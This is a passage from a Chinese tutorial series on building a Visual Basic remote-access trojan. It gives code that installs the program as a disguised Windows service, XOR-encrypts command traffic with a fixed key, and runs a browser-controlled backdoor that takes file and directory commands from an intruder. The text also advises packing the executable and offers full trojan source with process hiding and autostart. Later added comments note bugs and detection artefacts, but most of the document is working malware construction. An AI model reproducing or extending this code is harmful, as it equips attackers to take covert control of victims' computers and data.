
[Visual Studio文章] 真正的VB木马,不用WINSOCK控件(3) 







VB代码(代码比较长,文章附源代码文件):
===================================================
' Win32 Service Control Manager (SCM) constants, types and advapi32.dll
' declarations used by the service module below. Every Declare binds the
' ANSI ("...A") entry point and carries handles and pointers as Long.

' Service type bits (dwServiceType in SERVICE_STATUS / CreateService).
Public Const SERVICE_WIN32_OWN_PROCESS = &H10&
Public Const SERVICE_WIN32_SHARE_PROCESS = &H20&
Public Const SERVICE_WIN32 = SERVICE_WIN32_OWN_PROCESS + _
SERVICE_WIN32_SHARE_PROCESS

' Control codes a service may advertise in dwControlsAccepted (see ServiceMain).
Public Const SERVICE_ACCEPT_STOP = &H1
Public Const SERVICE_ACCEPT_PAUSE_CONTINUE = &H2
Public Const SERVICE_ACCEPT_SHUTDOWN = &H4

' Access rights for OpenSCManager.
Public Const SC_MANAGER_CONNECT = &H1
Public Const SC_MANAGER_CREATE_SERVICE = &H2
Public Const SC_MANAGER_ENUMERATE_SERVICE = &H4
Public Const SC_MANAGER_LOCK = &H8
Public Const SC_MANAGER_QUERY_LOCK_STATUS = &H10
Public Const SC_MANAGER_MODIFY_BOOT_CONFIG = &H20

' Access rights for OpenService / CreateService. SERVICE_ALL_ACCESS is the
' union of STANDARD_RIGHTS_REQUIRED and every service-specific right below.
Public Const STANDARD_RIGHTS_REQUIRED = &HF0000
Public Const SERVICE_QUERY_CONFIG = &H1
Public Const SERVICE_CHANGE_CONFIG = &H2
Public Const SERVICE_QUERY_STATUS = &H4
Public Const SERVICE_ENUMERATE_DEPENDENTS = &H8
Public Const SERVICE_START = &H10
Public Const SERVICE_STOP = &H20
Public Const SERVICE_PAUSE_CONTINUE = &H40
Public Const SERVICE_INTERROGATE = &H80
Public Const SERVICE_USER_DEFINED_CONTROL = &H100
Public Const SERVICE_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or _
SERVICE_QUERY_CONFIG Or _
SERVICE_CHANGE_CONFIG Or _
SERVICE_QUERY_STATUS Or _
SERVICE_ENUMERATE_DEPENDENTS Or _
SERVICE_START Or _
SERVICE_STOP Or _
SERVICE_INTERROGATE Or _
SERVICE_USER_DEFINED_CONTROL)

' Start type passed to CreateService: started on demand, not at boot.
Public Const SERVICE_DEMAND_START As Long = &H3

' Error-control level passed to CreateService.
Public Const SERVICE_ERROR_NORMAL As Long = &H1

' Control codes delivered to the Handler procedure by the SCM.
Public Enum SERVICE_CONTROL
SERVICE_CONTROL_STOP = &H1
SERVICE_CONTROL_PAUSE = &H2
SERVICE_CONTROL_CONTINUE = &H3
SERVICE_CONTROL_INTERROGATE = &H4
SERVICE_CONTROL_SHUTDOWN = &H5
End Enum

' Values reported in SERVICE_STATUS.dwCurrentState.
Public Enum SERVICE_STATE
SERVICE_STOPPED = &H1
SERVICE_START_PENDING = &H2
SERVICE_STOP_PENDING = &H3
SERVICE_RUNNING = &H4
SERVICE_CONTINUE_PENDING = &H5
SERVICE_PAUSE_PENDING = &H6
SERVICE_PAUSED = &H7
End Enum

' Dispatch table for StartServiceCtrlDispatcher. The two *Null members are
' never assigned (Main only sets lpServiceName and lpServiceProc), so they
' stay zero and act as the all-zero terminating entry the API requires.
Public Type SERVICE_TABLE_ENTRY
lpServiceName As String
lpServiceProc As Long
lpServiceNameNull As Long
lpServiceProcNull As Long
End Type

' Mirror of the Win32 SERVICE_STATUS structure (seven DWORDs).
Public Type SERVICE_STATUS
dwServiceType As Long
dwCurrentState As Long
dwControlsAccepted As Long
dwWin32ExitCode As Long
dwServiceSpecificExitCode As Long
dwCheckPoint As Long
dwWaitHint As Long
End Type

' SCM client side: open/close the manager and individual services.
Public Declare Function OpenSCManager Lib "advapi32.dll" Alias _
"OpenSCManagerA" (ByVal lpMachineName As String, _
ByVal lpDatabaseName As String, ByVal dwDesiredAccess As Long) As Long
Public Declare Function CloseServiceHandle Lib "advapi32.dll" (ByVal hSCObject _
As Long) As Long
Public Declare Function OpenService Lib "advapi32.dll" Alias "OpenServiceA" _
(ByVal hSCManager As Long, ByVal lpServiceName As String, _
ByVal dwDesiredAccess As Long) As Long
Public Declare Function StartService Lib "advapi32.dll" Alias "StartServiceA" _
(ByVal hService As Long, ByVal dwNumServiceArgs As Long, _
ByVal lpServiceArgVectors As Long) As Long
' lpServiceStatus is passed ByRef (VB default) so the API can fill it in.
Public Declare Function ControlService Lib "advapi32.dll" (ByVal hService As _
Long, ByVal dwControl As Long, lpServiceStatus As SERVICE_STATUS) As Long
' Service side: connect this process to the SCM and report status.
Public Declare Function StartServiceCtrlDispatcher _
Lib "advapi32.dll" Alias "StartServiceCtrlDispatcherA" _
(lpServiceStartTable As SERVICE_TABLE_ENTRY) As Long
Public Declare Function RegisterServiceCtrlHandler _
Lib "advapi32.dll" Alias "RegisterServiceCtrlHandlerA" _
(ByVal lpServiceName As String, ByVal lpHandlerProc As Long) _
As Long
Public Declare Function SetServiceStatus _
Lib "advapi32.dll" (ByVal hServiceStatus As Long, _
lpServiceStatus As SERVICE_STATUS) As Long
' CreateServiceA. lpdwTagId is declared As String although the native
' parameter is a pointer to a DWORD; the only caller in this listing passes
' vbNullString for it, so the mismatch is harmless there. The parameter
' named "lp" sits in the service start-name (account) position.
Public Declare Function CreateService _
Lib "advapi32.dll" Alias "CreateServiceA" _
(ByVal hSCManager As Long, ByVal lpServiceName As String, _
ByVal lpDisplayName As String, ByVal dwDesiredAccess As Long, _
ByVal dwServiceType As Long, ByVal dwStartType As Long, _
ByVal dwErrorControl As Long, ByVal lpBinaryPathName As String, _
ByVal lpLoadOrderGroup As String, ByVal lpdwTagId As String, _
ByVal lpDependencies As String, ByVal lp As String, _
ByVal lpPassword As String) As Long
Public Declare Function DeleteService _
Lib "advapi32.dll" (ByVal hService As Long) As Long

' Module-level state shared by ServiceMain and Handler: the status handle
' returned by RegisterServiceCtrlHandler and the status record reported to
' the SCM.
Public hServiceStatus As Long
Public ServiceStatus As SERVICE_STATUS

' Fixed service name used for install, uninstall, registration and dispatch.
Public Const SERVICE_NAME As String = "NT-Service" 'service name

' Service entry point. The SCM calls it once StartServiceCtrlDispatcher
' (see Main) has connected this process to the SCM. dwArgc/lpszArgv are the
' argc/argv the SCM passes; neither is read here.
' Fills the module-level ServiceStatus, registers Handler as the control
' handler and reports START_PENDING followed immediately by RUNNING.
Sub ServiceMain(ByVal dwArgc As Long, ByVal lpszArgv As Long)
Dim B As Boolean
Dim U As Long 'unused
Dim Z As Long 'unused
'Initialise the status record: own-process service, starting up
ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS
ServiceStatus.dwCurrentState = SERVICE_START_PENDING
'Advertise STOP, PAUSE/CONTINUE and SHUTDOWN. Note that Handler has no
'SERVICE_CONTROL_SHUTDOWN case, so an accepted shutdown falls to its Case Else.
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP _
Or SERVICE_ACCEPT_PAUSE_CONTINUE _
Or SERVICE_ACCEPT_SHUTDOWN
ServiceStatus.dwWin32ExitCode = 0
ServiceStatus.dwServiceSpecificExitCode = 0
ServiceStatus.dwCheckPoint = 0
ServiceStatus.dwWaitHint = 0

' Register the control handler; the returned handle is kept for every later
' SetServiceStatus call. A zero (failure) return is not checked.
hServiceStatus = RegisterServiceCtrlHandler(SERVICE_NAME, _
AddressOf Handler)
ServiceStatus.dwCurrentState = SERVICE_START_PENDING
B = SetServiceStatus(hServiceStatus, ServiceStatus)

' No start-up work happens between the two reports, so the service goes
' straight to RUNNING. The result B is never examined.
ServiceStatus.dwCurrentState = SERVICE_RUNNING
B = SetServiceStatus(hServiceStatus, ServiceStatus)
End Sub

' Service control handler registered by ServiceMain. The SCM calls it with
' one of the SERVICE_CONTROL_* codes; the handler updates the module-level
' ServiceStatus and reports it back with SetServiceStatus.
Sub Handler(ByVal fdwControl As Long)

Dim B As Boolean
Dim U As Long 'unused

Select Case fdwControl

' Pause and continue only change the reported state; nothing in the process
' is actually suspended or resumed.
Case SERVICE_CONTROL_PAUSE
ServiceStatus.dwCurrentState = SERVICE_PAUSED

Case SERVICE_CONTROL_CONTINUE
ServiceStatus.dwCurrentState = SERVICE_RUNNING

' Stop: report STOP_PENDING first, then STOPPED via the final call below.
' Nothing visible here ends the process; only the reported state changes.
Case SERVICE_CONTROL_STOP
ServiceStatus.dwWin32ExitCode = 0
ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING
ServiceStatus.dwCheckPoint = 0
ServiceStatus.dwWaitHint = 0
B = SetServiceStatus(hServiceStatus, ServiceStatus)
ServiceStatus.dwCurrentState = SERVICE_STOPPED

' INTERROGATE and every other code (including SERVICE_CONTROL_SHUTDOWN,
' which ServiceMain advertises as accepted) just re-report the current state.
Case SERVICE_CONTROL_INTERROGATE
Case Else
End Select
B = SetServiceStatus(hServiceStatus, ServiceStatus)

End Sub

' SCM-client helper (unlike Handler, which is the service side): opens the
' SCM and the "NT-Service" service and sends it one request.
' command: 0 = start the service; SERVICE_CONTROL_STOP / PAUSE / CONTINUE =
'          send that control code. Values outside 0..3 raise error 5.
' Returns: always False as written. The success path assigns a variable
'          named ServiceCommand instead of the function name HandlerEx, so
'          the function result is never set.
' Notes: GENERIC_EXECUTE is not declared anywhere in this listing, and the
' parameter name "command" hides VB's built-in Command function inside this
' procedure.
Function HandlerEx(ByVal command As Long) As Boolean
Dim hSCM As Long
Dim hService As Long
Dim res As Long
Dim lpServiceStatus As SERVICE_STATUS

' Reject anything outside the four supported values (error 5 = invalid
' procedure call or argument).
If command < 0 Or command > 3 Then Err.Raise 5

hSCM = OpenSCManager(vbNullString, vbNullString, GENERIC_EXECUTE)
If hSCM = 0 Then Exit Function

hService = OpenService(hSCM, SERVICE_NAME, GENERIC_EXECUTE)
If hService = 0 Then GoTo CleanUp

Select Case command
Case 0
res = StartService(hService, 0, 0)
Case SERVICE_CONTROL_STOP, SERVICE_CONTROL_PAUSE, _
SERVICE_CONTROL_CONTINUE
' lpServiceStatus receives the service's state after the control is sent.
res = ControlService(hService, command, lpServiceStatus)
End Select
If res = 0 Then GoTo CleanUp

' Intended as the success flag, but this is not the function name.
ServiceCommand = True

' Both handles are released on every path that reaches here.
CleanUp:
If hService Then CloseServiceHandle hService
CloseServiceHandle hSCM

End Function


' Identity function used to capture a procedure address as a Long: VB only
' accepts AddressOf as a call argument, so FncPtr(AddressOf ServiceMain)
' yields a value that can be stored in SERVICE_TABLE_ENTRY.lpServiceProc.
Function FncPtr(ByVal fnp As Long) As Long
FncPtr = fnp
End Function

' Program entry point (Sub Main, no startup form). Dispatches on the trimmed,
' lower-cased command line:
'   -uninstall : open the SCM and the "NT-Service" service, delete it, exit.
'   -install   : register this EXE as an own-process, demand-start service,
'                relaunch the EXE and exit.
'   anything   : hand the process to the SCM via StartServiceCtrlDispatcher;
'                when the dispatcher returns, load frmMain.
' CheckIsNT and frmMain are defined outside this listing. On Error Resume
' Next means every failed API call below is silently ignored.
' Defender note: the -install branch calls CreateService, which the SCM
' records as a service-install event (System log, event 7045) and persists
' under the registry Services key as "NT-Service" with this EXE as the
' binary path.
Sub Main()
On Error Resume Next
Dim hSCManager As Long
Dim hService As Long
Dim ServiceTableEntry As SERVICE_TABLE_ENTRY
Dim B As Boolean
Dim cmd As String
Dim U As Long 'unused

cmd = Trim(LCase(command()))
Select Case cmd
Case "-uninstall"
' End terminates the process, so the Exit Sub after it is never reached.
If CheckIsNT = False Then End: Exit Sub
hSCManager = OpenSCManager(vbNullString, vbNullString, _
SC_MANAGER_CREATE_SERVICE)
hService = OpenService(hSCManager, SERVICE_NAME, _
SERVICE_ALL_ACCESS)
' Marks the service for deletion; the handles are closed afterwards.
DeleteService hService
CloseServiceHandle hService
CloseServiceHandle hSCManager
End

Case "-install"
' On a non-NT system skip the service and run as an ordinary window.
If CheckIsNT = False Then Load frmMain: Exit Sub
'Install the NT-Service
hSCManager = OpenSCManager(vbNullString, vbNullString, _
SC_MANAGER_CREATE_SERVICE)
' Display name = service name; binary path = this EXE. Load-order group,
' tag id, dependencies, start account and password are all vbNullString.
hService = CreateService(hSCManager, SERVICE_NAME, _
SERVICE_NAME, SERVICE_ALL_ACCESS, _
SERVICE_WIN32_OWN_PROCESS, _
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, App.Path & "\" & App.EXEName & ".EXE", vbNullString, _
vbNullString, vbNullString, vbNullString, _
vbNullString)
CloseServiceHandle hService
CloseServiceHandle hSCManager
DoEvents
' "Path" is not declared in this listing (the CreateService call above uses
' App.Path); presumably an empty Variant if Option Explicit is off -- confirm.
Shell Path & App.EXEName & ".EXE" 'relaunch the EXE
End

Case Else
'Start as NT-Service
If CheckIsNT = False Then Load frmMain: Exit Sub
ServiceTableEntry.lpServiceName = SERVICE_NAME
ServiceTableEntry.lpServiceProc = FncPtr(AddressOf ServiceMain)
' Blocks while the SCM runs the service; the *Null members of the table
' entry are left zero as the terminating entry. The result B is not checked.
B = StartServiceCtrlDispatcher(ServiceTableEntry)
Load frmMain 'load the form and run the program body
End Select
End Sub
===================================================

十二、报文加密和报文格式
由于木马有时候传输的是敏感信息,而且数据包会被拦截分析,因此必须尽量少用不经过任何处理的明文传递数据,而是把明文数据加密成乱字符密文后发送,确保不被人伪造假命令或者窃取信息。
加密的思路其实不用很复杂,只要把它理解为货物出站时加一个包装箱,接收方拿到货物后打开箱子就可以了,只需在send时把字符串进行加密(Encrypt)就可以,对方recv后立即解密(Decrypt)就得到原始数据,接下来如何处理就看后面的代码了,例如:
===================================================
'Encrypt, then send. rc, wParam and SendData are defined outside this excerpt.
rc = Encrypt(rc, "a") 'encrypt with the one-character key "a"
SendData wParam, rc

'Receive, then decrypt. szBuf, lRet, sData and recv are defined outside
'this excerpt. Reads 256-byte chunks and keeps only the lRet bytes actually
'received; stops when recv returns <= 0 (peer closed the connection or error).
Do
szBuf = String(256, 0)
lRet = recv(wParam, ByVal szBuf, Len(szBuf), 0)
If lRet > 0 Then sData = sData + Left$(szBuf, lRet)
Loop Until lRet <= 0
sData = Decrypt(sData, "a") 'same fixed key on both ends
sData = Trim$(sData) 'drop surrounding spaces
===================================================

加密的方式有很多种,具体用哪种并不重要,重要的是,这种加密是否很容易被破译,最简单的一种方法是把原始数据的每个字符ASCII代码都减去1,这样出来的数据也可以算是面目全非了,接收后再把它们的ASCII值加上1即可。但是要想做比较强的加密,我推荐用密钥加密,破译的难度至少大一些。

VB代码:
===================================================
'Decrypt
' Inverse of Encrypt: for even-length input first reverse each half (the
' half-swap Encrypt applies last), then XOR every character with the
' repeating key. No return type is declared, so the result is a Variant.
' PlainStr is ByRef (VB default) and is overwritten in the even-length case,
' so the caller's own variable is modified as a side effect.
Function Decrypt(PlainStr As String, key As String)
Dim Char As String, KeyChar As String, NewStr As String
Dim Pos As Integer '1-based index into key, wraps after Len(key)
Dim i As Integer, Side1 As String, Side2 As String
Pos = 1

' Reversing each half is its own inverse, so applying it again here restores
' the XOR stream that Encrypt's loop produced.
If Len(PlainStr) Mod 2 = 0 Then
Side1 = StrReverse(Left(PlainStr, (Len(PlainStr) / 2)))
Side2 = StrReverse(Right(PlainStr, (Len(PlainStr) / 2)))
PlainStr = Side1 & Side2
End If

' Repeating-key XOR. With the one-character key "a" used by the callers in
' this article every character is XORed with the same constant, so the whole
' transform is a fixed per-character substitution and the key is a literal
' in the binary. Asc/Chr operate on character codes; behaviour for
' characters outside the single-byte range is not handled here -- confirm
' before relying on it for non-ASCII data.
For i = 1 To Len(PlainStr)
Char = Mid(PlainStr, i, 1)
KeyChar = Mid(key, Pos, 1)
NewStr = NewStr & Chr(Asc(Char) Xor Asc(KeyChar))
If Pos = Len(key) Then Pos = 0
Pos = Pos + 1
Next i

Decrypt = NewStr
End Function

'Encrypt
' XOR every character of PlainStr with the repeating key, then, when the
' result has even length, reverse each half in place. No return type is
' declared, so the result is a Variant. Decrypt undoes both steps in reverse
' order. PlainStr is ByRef (VB default) but is not modified here.
Function Encrypt(PlainStr As String, key As String)
Dim Char As String, KeyChar As String, NewStr As String
Dim Pos As Integer '1-based index into key, wraps after Len(key)
Dim i As Integer, Side1 As String, Side2 As String
Pos = 1

' Repeating-key XOR. The callers in this article pass the one-character key
' "a", so every character is XORed with the same constant: a fixed
' per-character substitution whose key is a string literal in the binary.
' Asc/Chr operate on character codes; behaviour for characters outside the
' single-byte range is not handled here -- confirm before relying on it.
For i = 1 To Len(PlainStr)
Char = Mid(PlainStr, i, 1)
KeyChar = Mid(key, Pos, 1)
NewStr = NewStr & Chr(Asc(Char) Xor Asc(KeyChar))
If Pos = Len(key) Then Pos = 0
Pos = Pos + 1
Next i

' Even length only: reverse the left half and the right half separately.
' Odd-length output is left as the plain XOR stream.
If Len(NewStr) Mod 2 = 0 Then
Side1 = StrReverse(Left(NewStr, (Len(NewStr) / 2)))
Side2 = StrReverse(Right(NewStr, (Len(NewStr) / 2)))
NewStr = Side1 & Side2
End If

Encrypt = NewStr
End Function
===================================================

除了加密,报文的格式也是重要的。没有制作经验的初学者往往不明白格式的重要性,而是直接把数据不加修饰的发送出去,如果功能少点还可以,如果功能多了,出错的机会也就大了。有的新手直接把汉字或其他非英文字符直接发出去,这更会引起不必要的麻烦,因为全世界并不是只有中国,也不是只有中文Windows,世界上还有韩文Windows、英文Windows等不支持中文内码的操作系统,它们会导致你的木马返回的数据变成乱码,正如在中文Windows上运行BIG5内码程序或日文内码程序一样。
没必要为报文格式定个标准,只要是自己处理起来方便的就可以。例如下面的报文:

HBUTROJAN/.../550/.../NOTWRITE/.../c:\windows\win.ini

我用“/.../”划分这个报文区域,因为这样的分割标记不容易被一些例外数据干扰,把分隔符去除后得到:

[前导标记] [ASCII代码] [信息1] [信息2]

客户端/服务端程序接收翻译部分代码的分解:
1.[前导标记] 预先定义为HBUTROJAN,如果用InStr或Left得不到这个数据,则表示程序接收到的数据并非服务端/客户端发送来的,跳出处理过程。如果含有这个标记,则进行下一个区域的处理。
2.[ASCII代码] 用数字做标识码,分别对应不同情况,例如200代表正常,404代表文件未找到,550表示权限拒绝等。
3.[信息1] 这里用于进一步解释返回的数据含义。
4.[信息2] 补充说明。
所以HBUTROJAN/.../550/.../NOTWRITE/.../c:\windows\win.ini经过翻译后可以知道要表达的是:无法写入文件 c:\windows\win.ini
经过这样的格式处理,把详细资料都放在程序内部进行翻译,而不是直接把要做的事传来传去,“含蓄”的木马通常可以让人摸不到头脑,呵呵。

十三、B/S模式
浏览器-服务器模式(Browser-Server,B/S)提供了一种简便的交互界面,无需专用的Client连接。Server端在受害者的机器等待入侵者用Internet Explorer等浏览器来发送命令,并以HTML页面方式返回返回数据。
要制作基于B/S模式的木马,前提是了解HTTP协议和基础的HTML制作,你不用学会制作复杂的表格,但是必须会最基本的表单提交,这是Browser与Server交互的唯一方式。

1.HTTP协议
HTTP协议使用TCP协议和明文字符传递数据,一个基本的HTTP请求如下(<CR>代表换行符):
===================================================
GET /index.htm HTTP/1.0<CR>
Accept:*/*<CR>
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)<CR>
Host:www.target.com<CR>
<CR>
<CR>
===================================================
HTTP请求可以略分为3个分段:
1.基本数据:GET /index.htm HTTP/1.0<CR>
表示用GET方法请求根目录的index.htm,使用HTTP1.0的协议版本,用换行符表示结束。
2.附加数据:Accept:*/*<CR>
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)<CR>
Host:www.target.com<CR>
跟随在HTTP/1.0后一行开始的字符无论有多少,都只是一种附加数据,用于详细说明该次HTTP请求需要什么细节设置,一般比较重要的是Set-Cookie和Referer信息。
3.结束标志:<CR><CR>(两个换行符)
这是表示HTTP请求结尾的标志,服务器必须接收到至少2个换行符才会对这次的HTTP报文进行处理。
根据HTTP报文格式,按照理论我们可以从基本数据段和附加数据段去开发B/S,但是由于浏览器不能让我们自定义附加数据,所以实际上只有用基本数据来控制木马。

2.最重要的HTML交互——表单提交
相信大家都知道在HTML页面里点击一个按钮发表文章帖子,这时候浏览器的后台操作是怎么样的呢?例如这段表单:
<form action="register"><p size=9px> 名字 <input type="text" name="UserName"></p><p> 年龄 <input name="Age" type="text"></p><input type="submit" value="注册"></form>

用工具捕获IE输出,可以看到点击按钮后实际是发送了以下HTTP请求:
PUT /register?UserName=LK007&Age=18 HTTP/1.0
Accept:text/html
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Host:www.target.com

虽然里面有我们需要的数据,但是无用数据也太多了,所以必须用一段代码去除枝叶,保留核心。
===================================================
Function ProcHTTP(strData As String) As String
'Strip an HTTP request down to its request-target: drop the method token and
'the " HTTP/..." suffix on the first line, the header block and the terminator.
'Author: K007
'Usage: stringVariable = ProcHTTP([HTTP request text])
'Returns the trimmed text between the method token and the next space, or ""
'when neither branch below matches.
'Note: the second branch compares the first four characters of the request
'with the three-character string "OST", so a real "POST ..." request line
'does not take it; in practice only GET requests are handled.
On Error Resume Next
Dim FindGet As Integer, FindPost As Integer, spc2 As Integer
If Mid$(strData$, 1, 3) = "GET" Then 'request starts with GET
FindGet = InStr(strData$, "GET ")
spc2 = InStr(FindGet + 5, strData$, " ") 'position of the second space (start of "HTTP")
ProcHTTP = Trim$(Mid$(strData$, FindGet + 4, spc2 - (FindGet + 4))) 'extract the target
ElseIf Mid$(strData$, 1, 4) = "OST" Then 'intended for POST; see the note above
FindPost = InStr(strData$, "OST ")
spc2 = InStr(FindPost + 5, strData$, " ") 'second space
ProcHTTP = Trim$(Mid$(strData$, FindPost + 5, spc2 - (FindPost + 5))) 'extract the target
End If
End Function
===================================================
一个完整的HTTP请求经过这段代码后变成:

/register?UserName=LK007&Age=18

这才是我们需要的核心部分,分析它的报文格式:

[目标文件]?[附加数据1=数据]&[附加数据2=数据]&..............

应用在木马中,可以这样理解:
[命令]?[参数1=值]&[参数2=值]&......
例如:/writefile?filename=c:\windows\desktop\user.txt&text=hello,nice%20to%20meet%20you
它表示用写入文件的命令往c:\windows\desktop\user.txt写入内容“hello,nice to meet you”,浏览器输出的中文和特殊字符报文必须经过URL编码,因此空格被编码成了%20。

3.B/S交互制作
(1).输出HTML
鉴于TCP协议的木马都是开个端口监听,和HTTP服务没什么两样,因此不必为B/S模式接收部分编写另外的代码,直接在recv里判断报文是否以GET/PUT开头即可。如果是一个HTTP请求则执行一段预先写好的HTML页面输出过程,例如:

===================================================
' Builds the fixed "show directory" form page as a raw HTTP/1.1 response
' string: status line, one Server header, then the HTML body. No return type
' is declared, so the result is a Variant. The response carries no
' Content-Type or Content-Length; two CRLFs end the header block and a third
' precedes the body.
' Defender note: the header value "Server: HBU Trojan" and the page title are
' fixed strings, so they appear verbatim both in the binary and on the wire.
Function DefaultHTML()
On Error Resume Next
Dim x As String
x = "HTTP/1.1 200 OK" & vbCrLf
x = x & "Server: HBU Trojan" & vbCrLf & vbCrLf
' The form submits to action "dir" with fields "directory" and "filter" --
' the names the parsing snippet later in the article looks for. The submit
' button has no name attribute, so it adds no extra query parameter.
x = x & vbCrLf & "<HTML><HEAD><TITLE>B/S Example .:owered by 小金::.</TITLE>" & _
"<META content=""text/html; charset=gb2312"" http-equiv=Content-Type>" & _
"</HEAD><BODY aLink=#ffffff bgColor=#4f9fdf bottomMargin=0 leftMargin=0 rightMargin=0 topMargin=0 vLink=#ffffff>" & _
"<p align=""center""><b><font size=""6"" color=""#000066"">显示目录</font></b></p>" & _
"<hr width=""100%"" size=""1"" color=""#FFFFFF"" ><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0""><tr><td width=""41%""><form action=""dir""><p size=9px> 路径 <input type=""text"" name=""directory"" value=""c:\""></p><p> 文件类型 <input name=""filter"" type=""text"" value=""*.*""></p><input type=""submit"" value=""显示""></form></td></tr></table><hr width=""100%"" size=""1"" color=""#FFFFFF"" ><p align=""center""><font face=""Arial"" size=""2"" color=""#FFFFFF""><b>© 2003 小金 制作 </b></font></p></BODY></HTML>"
DefaultHTML = x
End Function
===================================================
这段代码输出一个包含HTML内容的字符串,用Winsock发送出去就显示成一个简单的HTML页面了。

(2).表单提交和控制
先看一段表单模型:
<form action=[控制命令]><p>[内容描述]<input type="text" name=[参数1]></p><p>[内容描述2]<input type="text" name=[参数2]></p><input type="submit" value=[描述]><form>
注意<input type="submit" value=[描述]>,这是个提交按钮,必须省略它的NAME属性(完整的提交按钮格式是<input type="submit" name=[参数] value=[描述]>),否则浏览器会在所有数据后追加一个附加数据用于表示按钮,这样我们前面提到的“/register?UserName=LK007&Age=18”就会变成“/register?UserName=LK007&Age=18&[按钮NAME]=[按钮Value]”,对程序分割命令段没什么好处。

服务端接收到一个HTTP请求并去除枝叶后,就要对它进行分解,把命令和参数分离。
例如:
/dir?directory=c:\&filter=*.*
VB代码分解:
===================================================
' Splits a stripped request-target such as "/dir?directory=c:\&filter=*.*"
' into a command and up to 16 "name=value" pairs, then reads the pairs the
' "dir" command understands. Values are copied verbatim: nothing here undoes
' the %XX URL encoding the browser applies (see the earlier section), and
' InStr finds "directory=" / "filter=" anywhere in a pair, not only as its
' prefix. "Case ....." is the article's placeholder for further commands.
Dim strURL As String
Dim sCommand As String 'command
Dim sValue(15) As String 'at most 16 parameters are handled
Dim sTmp As String, sLength As Integer, i As Integer
strURL = "/dir?directory=c:\&filter=*.*"

strURL = Trim$(Right$(strURL, Len(strURL) - 1)) 'drop the leading "/"
' Command = text before "?". A target without "?" makes InStr return 0, so
' Left$ receives -1 and raises an error.
sCommand = Left$(strURL, InStr(strURL, "?") - 1) 'split command from parameters

' sTmp = everything after the "?"
sTmp = Right(strURL, (Len(strURL) - Len(sCommand) - 1))

' Peel off one "&"-separated pair per iteration; the final pair (no "&"
' left) is stored and the loop exits. Pairs beyond the 16th are dropped.
For i = 0 To 15
If InStr(sTmp, "&") = 0 Then sValue(i) = sTmp: Exit For
sValue(i) = Left$(sTmp, InStr(sTmp, "&") - 1)
sTmp = Right(sTmp, (Len(sTmp) - Len(sValue(i)) - 1))
Next

Select Case sCommand
Case "dir"
Dim sDir As String
Dim sFilter As String
' Scan every slot; unset slots are "" and match nothing.
For i = 0 To 15
If InStr(sValue(i), "directory=") <> 0 Then
sDir = Right$(sValue(i), Len(sValue(i)) - 10) 'Len("directory=")=10
ElseIf InStr(sValue(i), "filter=") <> 0 Then
sFilter = Right$(sValue(i), Len(sValue(i)) - 7) 'Len("filter=")=7
Else
End If
Next
Case .....
Case Else
End Select
===================================================
最终得到命令“dir c:\*.*”。
然后可以用多种方法执行这个命令,如Shell、CreateProcess等,把执行结果用一个HTML页面返回数据:
===================================================
' Wraps sData in the fixed "view directory" result page and returns it as a
' raw HTTP/1.1 response string (status line, one Server header, HTML body).
' No return type is declared, so the result is a Variant. sData is inserted
' inside a <pre> element as-is, with no HTML escaping. As in DefaultHTML the
' response has no Content-Type or Content-Length and carries the fixed
' "Server: HBU Trojan" header, a constant that is visible on the wire.
Function OutputHTML(sData As String)
On Error Resume Next
Dim x As String
x = "HTTP/1.1 200 OK" & vbCrLf
x = x & "Server: HBU Trojan" & vbCrLf & vbCrLf
x = x & vbCrLf & "<HTML><HEAD><TITLE>B/S Example .:owered by 小金::.</TITLE>" & _
"<META content=""text/html; charset=gb2312"" http-equiv=Content-Type>" & _
"</HEAD><BODY aLink=#ffffff bgColor=#4f9fdf bottomMargin=0 leftMargin=0 rightMargin=0 topMargin=0 vLink=#ffffff>" & _
"<p align=""center""><b><font size=""6"" color=""#000066"">查看目录</font></b></p>" & _
"<hr width=""100%"" size=""1"" color=""#FFFFFF"" ><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0""><tr><td width=""41%""><p align=""center""><font color=""#FFFFFF"" size=""6""><b><font size=""7""><pre>" & sData & "</pre></font></b></font></p></td></tr></table><hr width=""100%"" size=""1"" color=""#FFFFFF"" ><p align=""center""><font face=""Arial"" size=""2"" color=""#FFFFFF""><b>© 2003 小金 制作 </b></font></p></BODY></HTML>"
OutputHTML = x
End Function
===================================================

4.与加密报文冲突的解决
由于HTTP使用明文传输,所以支持B/S模式的木马就必须用明文传输,这似乎与前面的报文加密冲突,其实只要在发送和接收的时候判断一下HTTP请求和HTML页面的特征字符串就可以了。
===================================================
'Encrypt, then send. The plaintext/ciphertext decision is made from the
'payload itself: outgoing data containing "<HTML><HEAD><TITLE>" is sent in
'the clear, everything else is XORed with the fixed key "a".
'rc, wParam and SendData are defined outside this excerpt.
If InStr(rc,"<HTML><HEAD><TITLE>")=0 Then rc = Encrypt(rc, "a") 'no HTML marker found, so encrypt
SendData wParam, rc

'Receive, then decrypt. szBuf, lRet, sData and recv are defined outside this
'excerpt. Reads 256-byte chunks, keeping only the lRet bytes received, until
'recv returns <= 0 (peer closed the connection or error).
Do
szBuf = String(256, 0)
lRet = recv(wParam, ByVal szBuf, Len(szBuf), 0)
If lRet > 0 Then sData = sData + Left$(szBuf, lRet)
Loop Until lRet <= 0
'Incoming data containing "HTTP/" anywhere is treated as a clear-text HTTP
'request and left alone; anything else is decrypted with the same fixed key.
If InStr(sData,"HTTP/") =0 Then sData = Decrypt(sData, "a") 'no HTTP request marker, so decrypt
sData = Trim$(sData) 'drop surrounding spaces
===================================================

限于篇幅问题,B/S控制就简单的介绍到这里了。

十四、编译和加壳
虽然去除了ActiveX,但是VB程序必须依靠VB运行库才能运行,所以推荐用VB5.0编译成EXE,因为Win9x没有自带MSVBVM60.DLL。加壳也是必要的,可以尽量减小VB程序的体积,也避免EXE文件被随意修改。用API写的VB木马一般可以将体积控制在64KB以下。

十五、源代码
附上一个简单的带有自启动、隐藏进程、NT-Service、B/S控制(端口80)的木马例子,希望能给大家带来一点制作经验。由于直接使用浏览器控制,所以就偷懒不写Client端了,实际应用中最好能让木马同时支持C/S、B/S。

补充说明

